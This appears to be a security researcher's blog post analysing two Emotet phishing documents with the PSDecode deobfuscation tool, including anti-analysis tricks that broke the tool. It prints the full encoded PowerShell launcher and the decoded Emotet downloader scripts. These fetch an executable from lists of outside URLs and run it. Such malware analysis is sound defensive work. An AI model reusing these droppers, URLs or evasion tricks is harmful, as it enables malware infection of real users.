PSDecode, follow-on analysis of Emotet samples

PSDecode, follow-on analysis of Emotet samples

In my analysis of an emotet sample, I came across PSDecode, and, after some back and forth with the author and a couple updates, got it working on this sample. The tool is very cool. What follows is analysis of a different emotet phishing document similar to the other one I was looking at, as well as PSDecode output for the previous sample.

PSDecode

According to this blog post from the author, PSDecode was born out of emotet analysis. The idea is that he uses method overriding to change what expressions like Invoke-Expression do. So if instead of running code, IEX now prints it to the screen, PSDecode is doing what I did manually in my previous analysis.

Given that emotet is called out by the author, and that emotet is well known for constantly changing to get ahead of defenses, it’s not surprising that the recent samples I’m playing with today cause it some issues. It’s always a game of cat and mouse.

File Info

I’ll look at a couple emotet samples here:

Filename	INV601213082839.doc
md5	a463ce8f2c2a943e2396e49bfbdd687a
VT Link	virus total

Filename	Facture-impayee-30-mai#0730-04071885.doc
md5	e6f329eef248d8124a8fa93316f54fd1
VT Link	virus total

INV601213082839.doc

Since I’ve already posted analysis of the other sample, I’ll start with this sample.

The VBA is very similar to the other sample, and it deobfuscates and runs a powershell one-liner:

PowersHeLL -WinDowsTyle hidden -e JgAoACAAJABQAFMAaABvAG0ARQBbADQAXQArACQAcABzAGgAbwBNAEUAWwAzADQAXQArACcAWAAnACkAIAAoACAAKAAoACgAIgB7ADIAMgB9AHsAMQAzADYAfQB7ADgAMwB9AHsAMQAxADIAfQB7ADEANAA2AH0AewAxADIANAB9AHsAMQAyADEAfQB7ADEAMgA3AH0AewAxADYANAB9AHsAMQA1ADkAfQB7ADkAOAB9AHsAMQAzADkAfQB7ADEAMwA4AH0AewAyADMAfQB7ADcAMwB9AHsAMQA1ADAAfQB7ADEAMQAxAH0AewA5ADMAfQB7ADEANgA1AH0AewAxADYANwB9AHsAMQA0ADgAfQB7ADEAMwB9AHsANAAyAH0AewA3AH0AewA2ADgAfQB7ADEAMgA2AH0AewA2ADMAfQB7ADMAMgB9AHsAOQA5AH0AewAxADcANgB9AHsANgA5AH0AewAxADQAfQB7ADEAMAB9AHsAMwA1AH0AewAxADUAMwB9AHsAOQAxAH0AewAxADUAMQB9AHsAMQA3ADUAfQB7ADEAMwA1AH0AewA0AH0AewAxADcAMgB9AHsANwAwAH0AewAxADMAMgB9AHsAMAB9AHsANAA4AH0AewA2ADEAfQB7ADMANgB9AHsAOAB9AHsAMQAwADUAfQB7ADEAMQB9AHsAMwA4AH0AewA1AH0AewA2ADQAfQB7ADUAMQB9AHsANgA3AH0AewAyADQAfQB7ADEAMwAzAH0AewAxADUAMgB9AHsAMgA3AH0AewA3ADgAfQB7ADMAfQB7ADUAMAB9AHsAOAA3AH0AewAxADYAOQB9AHsAMQAzADQAfQB7ADMAMwB9AHsAMQAwADEAfQB7ADEANQB9AHsAMQA3AH0AewAxADcANAB9AHsANwAyAH0AewAxAH0AewAxADUANAB9AHsAOAA4AH0AewAzADAAfQB7ADcAMQB9AHsAMQA2AH0AewA1ADMAfQB7ADEANAAyAH0AewA5ADUAfQB7ADQANwB9AHsAMQAxADUAfQB7ADQAOQB9AHsAMQA1ADYAfQB7ADEAMQA0AH0AewAxADQAOQB9AHsAMQAwADMAfQB7ADEANgA2AH0AewAyADYAfQB7ADUANwB9AHsAMgB9AHsANQA1AH0AewAxADQANwB9AHsAMQAyAH0AewA2AH0AewAxADIAMgB9AHsAMQA3ADcAfQB7ADkAMAB9AHsANgA2AH0AewAxADYAMQB9AHsAMQA2ADMAfQB7ADQANAB9AHsAOAA5AH0AewA2ADUAfQB7ADQAMQB9AHsAMQAwADkAfQB7ADEAMAAwAH0AewA3ADQAfQB7ADUANAB9AHsAMQA0ADMAfQB7ADIAOAB9AHsANwA5AH0AewA5ADQAfQB7ADcANwB9AHsANQA2AH0AewAxADIAMAB9AHsAMQAxADgAfQB7ADEANAA0AH0AewAxADAANAB9AHsAMQA3ADMAfQB7ADcANgB9AHsAMQA0ADUAfQB7ADMAMQB9AHsANAA2AH0AewA0ADUAfQB7ADkANgB9AHsAMgA5AH0AewA4ADYAfQB7ADEANgA4AH0AewAxADYAMAB9AHsAOQB9AHsAMQAzADAAfQB7ADEAMgAzAH0AewAxADcAMQB9AHsAOAA1AH0AewA4ADEAfQB7ADgAMAB9AHsAMQA0ADEAfQB7ADEAMwA3AH0AewA1ADIAfQB7ADEAMQA5AH0AewA4ADIAfQB7ADQAMwB9AHsAOQA3AH0AewAyADUAfQB7ADcANQB9AHsAMQAwADcAfQB7ADEAMQAwAH0AewAxADUANQB9AHsAMgAwAH0AewAxADUAOAB9AHsAMQA4AH0AewAyADEAfQB7ADEAMAAyAH0AewA4ADQAfQB7ADEAMAA2AH0AewAxADIAOQB9AHsANQA4AH0AewAzADQAfQB7ADQAMAB9AHsAOQAyAH0AewAxADcAMAB9AHsANgAwAH0AewAxADIANQB9AHsAMQAxADcAfQB7ADYAMgB9AHsAMwA5AH0AewAxADUANwB9AHsAMQA2ADIAfQB7ADEANAAwAH0AewAxADEAMwB9AHsAMQAwADgAfQB7ADUAOQB9AHsAMQAzADEAfQB7ADEAOQB9AHsAMQAxADYAfQB7ADEAMgA4AH0AewAzADcAfQAiAC0AZgAgACcAMQAnACwAJwAvACcALAAnAHAAJwAsACcALwBzAHMAZgBtACcALAAnACkAOwAnACwAJwAvACcALAAnAGUAJwAsACcAMQBEAGYAJwAsACcAZAAnACwAJwBvAHIAZQBhAGMAJwAsACcAIAA4AE4AJwAsACcALwBEADYAeQBkACcALAAnAHEAdQAnACwAJwBmAC0AbwBiAGoAJwAsACcAUwBCACAAPQAnACwAJwBoAHQAdABwADoALwAvACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAbABhACcALAAnAGIAZwAnACwAJwA7AH0AJwAsACcAbwBTAHQAJwAsACcAdQBpAGIAZwB1AE4AZwBFADgARAAnACwAJwA4AE4AJwAsACcAYwAxAEQAZgArADEARABmACcALAAnAHUAYQBsAC0AcwBvAHUAJwAsACcAZwAnACwAJwBWAGEAYwBIAC8AQABoAHQAJwAsACcALgBjACcALAAnAEMAIAAnACwAJwArACcALAAnAHoAVQB6AC8AJwAsACcAQgAgACsAIAAoADEAJwAsACcALgBXAGUAJwAsACcAawAnACwAJwAxAEQAZgAnACwAJwBnAG4AcwBhACcALAAnAHQAdABwADoALwAvAG8AZAAnACwAJwB9AH0AJwAsACcAOQB4ACcALAAnAGYAJwAsACcASQBuACcALAAnAFMAcABsAGkAdAAoADEARAAnACwAJwBlAGMAdAAnACwAJwBiAGcAdQBPAGEAZABGACcALAAnADgAJwAsACcALgAnACwAJwBEAGYAJwAsACcAaAAnACwAJwBEACcALAAnAHcAJwAsACcALwAnACwAJwA6ACcALAAnADgAJwAsACcAaABlACcALAAnAE4AJwAsACcAOgAvACcALAAnACAAMQBEAGYATgA4ACcALAAnAHQAJwAsACcAKAAnACwAJwA7ACcALAAnAEQAJwAsACcAZgANAAoAaAAnACwAJwArADEARAAnACwAJwBlAHQAJwAsACcAQABoAHQAdABwACcALAAnAC8AMQBEAGYALgAnACwAJwBpAG4AawBpACcALAAnAC8ALwB2AGkAcwAnACwAJwApACAAUwB5AHMAdABlAG0AJwAsACcATgAnACwAJwBOAGcAQQBEAEMAWAAgAD0AJwAsACcAQAAnACwAJwAxADEALgBkAGUAJwAsACcAdAAxAEQAZgApACcALAAnADsAOAAnACwAJwB1AGwAZQBFADgARAAoADgAJwAsACcAOABOAGcATgAnACwAJwAgACsAJwAsACcAbwBtACcALAAnAD0AIAA4AE4AZwBlAG4AdgA6AHAAdQAnACwAJwB7AHQAcgB5AHsAOABOAGcAWQBZACcALAAnAEMAWAApACcALAAnAGwAJwAsACcAbgBzAGEAJwAsACcAKQAsACAAOABOAGcAUwAnACwAJwAgADgATgBnAEEARAAnACwAJwAxAEQAZgBlADEAJwAsACcAUgAnACwAJwBjACcALAAnAGMAcgAyAEsAJwAsACcAbQAvAHQAaAAnACwAJwBkAC4AbgBlACcALAAnAHYAbwAxAEQAJwAsACcAIAAuACcALAAnAGIAbABpAGMAJwAsACcAdAAnACwAJwBlAHgAMQBEAGYAJwAsACcASQBiACcALAAnAC0AJwAsACcAYgBDAGwAaQBlAG4AJwAsACcAQAAxAEQAZgApACcALAAnAEoALwBAACcALAAnACgAJwAsACcALwAnACwAJwAgACsAJwAsACcAYgBvAGQAcwAuAGMAbwAuAHUAawAnACwAJwBEAEMAKQA7ACcALAAnAE4AZwBhACcALAAnACkAJwAsACcAZgAnACwAJwBzACcALAAnAGQAbwBtADsAOABOAGcAWQBZAFUAIAA9ACcALAAnAGQAJwAsACcAZwBTAEQAQwAnACwAJwAuAGQAJwAsACcALQAnACwAJwBjAGEAdAAnACwAJwAxAEQAZgAnACwAJwAxACcALAAnAEQARABvAGIAZwB1AFcAbgAnACwAJwBNACcALAAnAD0AIAAmACgAMQBEACcALAAnAHMAdAAnACwAJwAoADgATgBnACcALAAnACAAJwAsACcAZgBrACcALAAnAC4ATgAnACwAJwBmAG4AMQBEAGYAKwAxAEQAZgAnACwAJwBjAGgAewAnACwAJwAmACcALAAnAGgAJwAsACcAYgByAGUAYQBrACcALAAnACAAJwAsACcAbgBkACcALAAnAEkASwAnACwAJwAzACcALAAnAGcAJwAsACcALgBFACcALAAnAGUAJwAsACcAbwBiAGoAJwAsACcAKQAoADgATgAnACwAJwBVACcALAAnAGwAbABtAHUAJwAsACcAZwBTAEQAJwAsACcARABmACcALAAnAFMAJwAsACcAYQBzAGQAJwAsACcALwBjAG8AbQAnACwAJwB3ADEARABmACsAMQBEACcALAAnAGUAJwAsACcAIAByAGEAbgAnACwAJwB4AHQAKAAxADAAMAAwADAALAAgADIAOAAyADEAJwAsACcAcwAnACwAJwBkAGEAcwAnACwAJwBOAHQAJwAsACcAZgBjAC4ARQA4AEQAVAAnACwAJwBvAHIAYgBzACcALAAnAGUALQBJAHQAJwAsACcAcgAnACwAJwAxAEQAZgB3ACcALAAnAGYAJwAsACcAbgBnAHIAaQBkAGUAJwAsACcAZQBtADEARABmACcALAAnAHIALwAxACcALAAnAGUAMQBEAGYAKwAnACwAJwAoADEARABmAG4AZQAnACwAJwBSAGEAWQAnACwAJwAxAEQAZgArADEARABmACcALAAnAEQAZgApADsAJwAsACcAcAAnACwAJwBmACsAMQAnACwAJwBhAHMAZgBjACAAaQBuACcALAAnADgAJwAsACcAIAAnACwAJwBuAGcAZQAyADAAJwAsACcAMwAnACwAJwB0ADsAOABOAGcAJwAsACcAcwBvAGYAdAB3AGEAcgBlAC4AYwBvACcAKQApACAALQBDAFIARQBQAEwAQQBDAEUAIAAnAE4AOABNACcALABbAGMASABBAHIAXQA5ADIALQBSAGUAUABsAGEAQwBlACgAWwBjAEgAQQByAF0ANAA5ACsAWwBjAEgAQQByAF0ANgA4ACsAWwBjAEgAQQByAF0AMQAwADIAKQAsAFsAYwBIAEEAcgBdADMAOQAtAEMAUgBFAFAATABBAEMARQAnAEUAOABEACcALABbAGMASABBAHIAXQAzADQALQBSAGUAUABsAGEAQwBlACAAJwA4AE4AZwAnACwAWwBjAEgAQQByAF0AMwA2AC0AUgBlAFAAbABhAEMAZQAoAFsAYwBIAEEAcgBdADkAOAArAFsAYwBIAEEAcgBdADEAMAAzACsAWwBjAEgAQQByAF0AMQAxADcAKQAsAFsAYwBIAEEAcgBdADkANgApACkA

Try PSDecode:

After installing PSDecode per the instructions on GitHub, and saving that powershell one liner to a file, INV-powershell_base64.txt, I give it a whirl:

PS C:\Users\df> cat .\INV-powershell_base64.txt | PSDecode

Unfortunately, the Window just dies.

Manually decoded Powershell

Since we can’t run PSDecode on the sample above for some reason, let’s base64 decoede it manually. That gives the following:

$ cat INV-powershell_base64.txt | cut -d' ' -f5 | base64 -d
&( $PShomE[4]+$pshoME[34]+'X') ( ((("{22}{136}{83}{112}{146}{124}{121}{127}{164}{159}{98}{139}{138}{23}{73}{150}{111}{93}{165}{167}{148}{13}{42}{7}{68}{126}{63}{32}{99}{176}{69}{14}{10}{35}{153}{91}{151}{175}{135}{4}{172}{70}{132}{0}{48}{61}{36}{8}{105}{11}{38}{5}{64}{51}{67}{24}{133}{152}{27}{78}{3}{50}{87}{169}{134}{33}{101}{15}{17}{174}{72}{1}{154}{88}{30}{71}{16}{53}{142}{95}{47}{115}{49}{156}{114}{149}{103}{166}{26}{57}{2}{55}{147}{12}{6}{122}{177}{90}{66}{161}{163}{44}{89}{65}{41}{109}{100}{74}{54}{143}{28}{79}{94}{77}{56}{120}{118}{144}{104}{173}{76}{145}{31}{46}{45}{96}{29}{86}{168}{160}{9}{130}{123}{171}{85}{81}{80}{141}{137}{52}{119}{82}{43}{97}{25}{75}{107}{110}{155}{20}{158}{18}{21}{102}{84}{106}{129}{58}{34}{40}{92}{170}{60}{125}{117}{62}{39}{157}{162}{140}{113}{108}{59}{131}{19}{116}{128}{37}"-f '1','/','p','/ssfm',');','/','e','1Df','d','oreac',' 8N','/D6yd','qu','f-obj','SB =','http://','http://','la','bg',';}','oSt','uibguNgE8D','8N','c1Df+1Df','ual-sou','g','VacH/@ht','.c','C ','+','zUz/','B + (1','.We','k','1Df','gnsa','ttp://od','}}','9x','f','In','Split(1D','ect','bguOadF','8','.','Df','h','D','w','/',':','8','he','N',':/',' 1DfN8','t','(',';','D','f
h','+1D','et','@http','/1Df.','inki','//vis',') System','N','NgADCX =','@','11.de','t1Df)',';8','uleE8D(8','8NgN',' +','om','= 8Ngenv:pu','{try{8NgYY','CX)','l','nsa','), 8NgS',' 8NgAD','1Dfe1','R','c','cr2K','m/th','d.ne','vo1D',' .','blic','t','ex1Df','Ib','-','bClien','@1Df)','J/@','(','/',' +','bods.co.uk','DC);','Nga',')','f','s','dom;8NgYYU =','d','gSDC','.d','-','cat','1Df','1','DDobguWn','M','= &(1D','st','(8Ng',' ','fk','.N','fn1Df+1Df','ch{','&','h','break',' ','nd','IK','3','g','.E','e','obj',')(8N','U','llmu','gSD','Df','S','asd','/com','w1Df+1D','e',' ran','xt(10000, 2821','s','das','Nt','fc.E8DT','orbs','e-It','r','1Dfw','f','ngride','em1Df','r/1','e1Df+','(1Dfne','RaY','1Df+1Df','Df);','p','f+1','asfc in','8',' ','nge20','3','t;8Ng','software.co')) -CREPLACE 'N8M',[cHAr]92-RePlaCe([cHAr]49+[cHAr]68+[cHAr]102),[cHAr]39-CREPLACE'E8D',[cHAr]34-RePlaCe '8Ng',[cHAr]36-RePlaCe([cHAr]98+[cHAr]103+[cHAr]117),[cHAr]96))

Anti-PSDecode technique 1 - unicode

The linux host is actually hiding something important in the previous output - this is actually a unicode string, as you can see when you view it in hexdump:

$ cat INV-powershell_base64.txt | cut -d' ' -f5 | base64 -d | hexdump -C | head
00000000  26 00 28 00 20 00 24 00  50 00 53 00 68 00 6f 00  |&.(. .$.P.S.h.o.|
00000010  6d 00 45 00 5b 00 34 00  5d 00 2b 00 24 00 70 00  |m.E.[.4.].+.$.p.|
00000020  73 00 68 00 6f 00 4d 00  45 00 5b 00 33 00 34 00  |s.h.o.M.E.[.3.4.|
00000030  5d 00 2b 00 27 00 58 00  27 00 29 00 20 00 28 00  |].+.'.X.'.). .(.|
00000040  20 00 28 00 28 00 28 00  22 00 7b 00 32 00 32 00  | .(.(.(.".{.2.2.|
00000050  7d 00 7b 00 31 00 33 00  36 00 7d 00 7b 00 38 00  |}.{.1.3.6.}.{.8.|
00000060  33 00 7d 00 7b 00 31 00  31 00 32 00 7d 00 7b 00  |3.}.{.1.1.2.}.{.|
00000070  31 00 34 00 36 00 7d 00  7b 00 31 00 32 00 34 00  |1.4.6.}.{.1.2.4.|
00000080  7d 00 7b 00 31 00 32 00  31 00 7d 00 7b 00 31 00  |}.{.1.2.1.}.{.1.|
00000090  32 00 37 00 7d 00 7b 00  31 00 36 00 34 00 7d 00  |2.7.}.{.1.6.4.}.|

That actually breaks PSDecode. The author is looking into it, but for now, we need another path. Luckily we can decode this ourselves very easily.

$ cat INV-powershell_base64.txt | cut -d' ' -f5 | base64 -d > INV-powershell_decoded.txt

When I try to run PSDecode on this sample now, it just hangs. It turns out that the unicode string is breaking things. One way to get around this would be to convert the string to ascii. I like to do that with strings in linux:

$ cat INV-powershell_decoded.txt | strings -el > INV-powershell_decoded_ascii.txt
$ hexdump -C INV-powershell_decoded_ascii.txt | head -2
00000000  26 28 20 24 50 53 68 6f  6d 45 5b 34 5d 2b 24 70  |&( $PShomE[4]+$p|
00000010  73 68 6f 4d 45 5b 33 34  5d 2b 27 58 27 29 20 28  |shoME[34]+'X') (|

But better yet, in working with these samples, the author added a -u flag for PSDecode so that it could interact with unicode strings naturally. It still doesn’t fix the problem when the top layer is ascii and the next layer is unicode, but it allows us to move forward here without creating another file.

Anti-PSDecode technique 2 - new lines

When I started this analysis, there was another speedbump the emotet authors had thrown in that caused PSDecode not to work. The malware author inserted line breaks inside strings (between ' '). We can see this here:

$ cat INV-powershell_base64.txt | cut -d' ' -f5 | base64 -d | hexdump -C | grep " 0a "
00000940  44 00 27 00 2c 00 27 00  66 00 0d 00 0a 00 68 00  |D.'.,.'.f.....h.|
00000950  27 00 2c 00 27 00 2b 00  31 00 44 00 27 00 2c 00  |'.,.'.+.1.D.'.,.|

The 0d 00 0a 00 is a classic line break, and appears like 'f\x0d\x0a\h'. By putting this inside ', it is still technically one line:

$ cat ../INV601213082839.doc/INV-powershell_base64.txt | cut -d' ' -f5 | base64 -d | wc -l
1

This had broken PSDecode, but the author put out a new version on 5 June 2018 to fix that.

PSDecode - success

Now, try PSDecode on that powershell, and it works:

PS C:\Users\df> PSDecode -u .\INV-powershell_decoded.txt


############################## Layer 1 ##############################
&( $PShomE[4]+$pshoME[34]+'X') ( ((("{22}{136}{83}{112}{146}{124}{121}{127}{164}{159}{98}{139}{138}{23}{73}{150}{111}{93}{165}{167}{148}{13}{42}{7}{68}{126}{63}{32}{99}{176}{69}{14}{10}{35}{153}{91}{151}{175}{135}{4}{172}{70}{132}{0}{48}{61}{36}{8}{105}{11}{38}{5}{64}{51}{67}{24}{133}{152}{27}{78}{3}{50}{87}{169}{134}{33}{101}{15}{17}{174}{72}{1}{154}{88}{30}{71}{16}{53}{142}{95}{47}{115}{49}{156}{114}{149}{103}{166}{26}{57}{2}{55}{147}{12}{6}{122}{177}{90}{66}{161}{163}{44}{89}{65}{41}{109}{100}{74}{54}{143}{28}{79}{94}{77}{56}{120}{118}{144}{104}{173}{76}{145}{31}{46}{45}{96}{29}{86}{168}{160}{9}{130}{123}{171}{85}{81}{80}{141}{137}{52}{119}{82}{43}{97}{25}{75}{107}{110}{155}{20}{158}{18}{21}{102}{84}{106}{129}{58}{34}{40}{92}{170}{60}{125}{117}{62}{39}{157}{162}{140}{113}{108}{59}{131}{19}{116}{128}{37}"-f '1','/','p','/ssfm',');','/','e','1Df','d','oreac',' 8N','/D6yd','qu','f-obj','SB =','http://','http://','la','bg',';}','oSt','uibguNgE8D','8N','c1Df+1Df','ual-sou','g','VacH/@ht','.c','C ',,'zUz/','B + (1','.We','k','1Df','gnsa','ttp://od','}}','9x','f','In','Split(1D','ect','bguOadF','8','.','Df','h','D','w','/',':','8','he','N',':/',' 1DfN8','t','(',';','D','f h','+1D','et','@http','/1Df.','inki','//vis',') System','N','NgADCX =','@','11.de','t1Df)',';8','uleE8D(8','8NgN',' +','om','= 8Ngenv:pu','{try{8NgYY','CX)','l','nsa','), 8NgS',' 8NgAD','1Dfe1','R','c','cr2K','m/th','d.ne','vo1D',' .','blic','t','ex1Df','Ib','-','bClien','@1Df)','J/@','(','/',' +','bods.co.uk','DC);','Nga',')','f','s','dom;8NgYYU =','d','gSDC','.d','-','cat','1Df','1','DDobguWn','M','= &(1D','st','(8Ng','','fk','.N','fn1Df+1Df','ch{','&','h','break','','nd','IK','3','g','.E','e','obj',')(8N','U','llmu','gSD','Df','S','asd','/com','w1Df+1D','e',' ran','xt(10000, 2821','s','das','Nt','fc.E8DT','orbs','e-It','r','1Dfw','f','ngride','em1Df','r/1','e1Df+','(1Dfne','RaY','1Df+1Df','Df);','p','f+1','asfc in','8','','nge20','3','t;8Ng','software.co')) -CREPLACE 'N8M',[cHAr]92-RePlaCe([cHAr]49+[cHAr]68+[cHAr]102),[cHAr]39-CREPLACE'E8D',[cHAr]34-RePlaCe '8Ng',[cHAr]36-RePlaCe([cHAr]98+[cHAr]103+[cHAr]117),[cHAr]96))


############################## Layer 2 ##############################
$nsadasd= &('new-object') random;$YYU = .('new-object') System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX =' http://oddbods.co.uk/D6yd9x/@http://visual-sounds.com/ssfm/RpIKkJ/@http://lange2011.de/NtczUz/@http://hellmuth-worbs.de/RaYVacH/@http://comquestsoftware.com/thinkingrider/18cr2K/'.Split('@');$SDC = $env:public + '\' +$NSB + ('.exe');foreach($asfc in $ADCX){try{$YYU."DoWnlOadFIle"($asfc."ToStriNg"(), $SDC);&('Invoke-Item')($SDC);break;}catch{}}


############################## Actions ##############################
1. [System.Random] Generate random integer between 10000 and 282133 . Value returned: 128403
2. [System.Net.WebClient.DownloadFile] Download from:  http://oddbods.co.uk/D6yd9x/
3. [System.Net.WebClient.DownloadFile] Save downloaded file to: C:\Users\Public\128403.exe
4. [Invoke-Item] Execute/Open: C:\Users\Public\128403.exe

The output provides the original obfuscated code, as well as the deobfuscated powershell, and a list of actions it performs. The actions is pretty good, though it does miss the loop over different stage-2 domains. Still, very cool!

Facture-impayee-30-mai#0730-04071885.doc

This sample is pretty much the same as the previous. Here’s the PSDecode output:

PS C:\Users\df> PSDecode -u .\Desktop\Facture-powershell_decoded.txt


############################## Layer 1 ##############################
InVoke-expReSsIoN(((("{13}{84}{37}{60}{97}{46}{15}{90}{93}{10}{111}{17}{20}{11}{96}{24}{38}{114}{33}{18}{91}{76}{32}{51}{65}{99}{30}{14}{28}{73}{26}{69}{41}{74}{77}{29}{63}{34}{47}{82}{102}{78}{50}{1}{43}{59}{54}{92}{21}{7}{80}{106}{8}{85}{31}{88}{52}{57}{61}{45}{22}{3}{103}{58}{64}{49}{0}{95}{56}{44}{105}{62}{110}{25}{55}{53}{67}{98}{107}{19}{70}{48}{94}{27}{75}{6}{9}{42}{81}{116}{113}{35}{71}{79}{12}{87}{86}{5}{108}{100}{104}{109}{16}{39}{115}{4}{89}{36}{101}{2}{72}{83}{68}{23}{66}{112}{40}" -f'd','p://','Gv)(','i','vInvoRGv+RG','T','foreac','7F/@http://wep','/I0ge4woC','h(m91','cRGv','m','Oa','m91ns','ent;m','Gv+RGveRGv',', ','Gv) ra','eRGv+RGvwRGv+',':public ','ndo','/4TQf','m/qU','C','1Y','net/M0','=','eR','9','ext(10','Net.WebCli','S/@','o','vn','33);m91','y{m91Y','RGv','dasd = &(R','YU = ','m91SDC);&','ch{}}','91nsad','asfc','knoc','asLB','onsports.co','R','A','91NSB','-design.','htt','bject','ttp://','Split(RGv@RGv','or','FNV/RGv.','/myk','l','L/@htt','.','Gv','ewist','@http://maddin','000, 2821','ps://aluga','RGv) Syst',')',');m91SDC ','D',' m','+ RGv5qwRGv + m','YU.diyDoA09W','m91','1NSB ','a','Gv);','-','sd.n',' ','nlA09','fun',' i','DCX = RGv','S','a','Y','iy(m91asfc.diy','dFIA09led','h','vkRGv+','+RGvw-ob','RGv','g','je',' + (RGv.exRGv+RGv','e',';m9','n','= m9','em.','rA09iA09','e-ItemR',' ','v','N','HL1/','ds.com','1env','oSt','gdiy()','g.','+RGvtR',';break;}cat','1ADCX){tr','.(RG','(RG','n m9'))-CrEPlAce ([chAr]53+[chAr]113+[chAr]119),[chAr]92  -REPlAcE'A09',[chAr]96-REPlAcE 'RGv',[chAr]39 -CrEPlAce  'm91',[chAr]36 -REPlAcE([chAr]100+[chAr]105+[chAr]121),[chAr]34))


############################## Layer 2 ##############################
$nsadasd = &('new-object') random;$YYU = .('new-object') System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = '  http://knoc.org/4TQf7F/@http://wepfunds.com/I0ge4woCYS/@http://lewistonsports.com/qUivL/@https://aluga-design.de/mykasLBHL1/@http://madding.net/M0FNV/'.Split('@');$SDC = $env:public + '\' + $NSB + ('.exe');foreach($asfc in $ADCX){try{$YYU."DoWnlOadFIle"($asfc."ToStriNg"(), $SDC);&('Invoke-Item')($SDC);break;}catch{}}


############################## Actions ##############################
1. [System.Random] Generate random integer between 10000 and 282133 . Value returned: 79770
2. [System.Net.WebClient.DownloadFile] Download from:   http://knoc.org/4TQf7F/
3. [System.Net.WebClient.DownloadFile] Save downloaded file to: C:\Users\Public\79770.exe
4. [Invoke-Item] Execute/Open: C:\Users\Public\79770.exe

Summary

PSDecode is a pretty awesome tool to see what obfuscated powershell is doing. It provides clear output at each layer of obfuscation, and shows provides a summary of what the code is doing. Identifying unicode text in the decode is a challenge, but one that we can easily work around since base64 decoding is easy. The author of the tool was also very responsive to issues.